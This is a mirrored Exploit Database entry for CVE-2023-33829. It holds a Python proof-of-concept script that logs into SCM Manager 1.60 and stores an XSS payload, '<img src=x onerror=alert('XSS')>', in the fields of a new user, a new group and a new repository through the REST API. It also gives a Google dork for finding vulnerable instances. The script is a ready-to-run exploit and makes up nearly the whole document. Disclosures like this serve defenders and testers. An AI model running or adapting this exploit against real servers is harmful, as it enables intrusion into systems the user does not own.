SCM Manager 1.60 – Cross-Site Scripting Stored (Authenticated)

• Exploit Database
• 146 阅读

• 作者： neg0x
  日期： 2023-05-25
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51488/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92

  #!/usr/bin/python3   # Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated) # Google Dork: intitle:"SCM Manager" intext:1.60 # Date: 05-25-2023 # Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829) # Vendor Homepage: https://scm-manager.org/ # Software Link: https://scm-manager.org/docs/1.x/en/getting-started/ # Version: 1.2 <= 1.60 # Tested on: Debian based # CVE: CVE-2023-33829   # Modules import requests import argparse import sys   # Main menu parser = argparse.ArgumentParser(description=&apos;CVE-2023-33829 exploit&apos;) parser.add_argument("-u", "--user", help="Admin user or user with write permissions") parser.add_argument("-p", "--password", help="password of the user") args = parser.parse_args()     # Credentials user = sys.argv[2] password = sys.argv[4]     # Global Variables main_url = "http://localhost:8080/scm" # Change URL if its necessary auth_url = main_url + "/api/rest/authentication/login.json" users = main_url + "/api/rest/users.json" groups = main_url + "/api/rest/groups.json" repos = main_url + "/api/rest/repositories.json"   # Create a session session = requests.Session()   # Credentials to send post_data={ &apos;username&apos;: user, # change if you have any other user with write permissions &apos;password&apos;: password # change if you have any other user with write permissions }   r = session.post(auth_url, data=post_data)   if r.status_code == 200: print("[+] Authentication successfully") else: print("[-] Failed to authenticate") sys.exit(1)   new_user={   "name": "newUser", "displayName": "<img src=x onerror=alert(&apos;XSS&apos;)>", "mail": "", "password": "", "admin": False, "active": True, "type": "xml"   }   create_user = session.post(users, json=new_user) print("[+] User with XSS Payload created")   new_group={   "name": "newGroup", "description": "<img src=x onerror=alert(&apos;XSS&apos;)>", "type": "xml"   }   create_group = session.post(groups, json=new_group) print("[+] Group with XSS Payload created")   new_repo={   "name": "newRepo", "type": "svn", "contact": "", "description": "<img src=x onerror=alert(&apos;XSS&apos;)>", "public": False   }   create_repo = session.post(repos, json=new_repo) print("[+] Repository with XSS Payload created")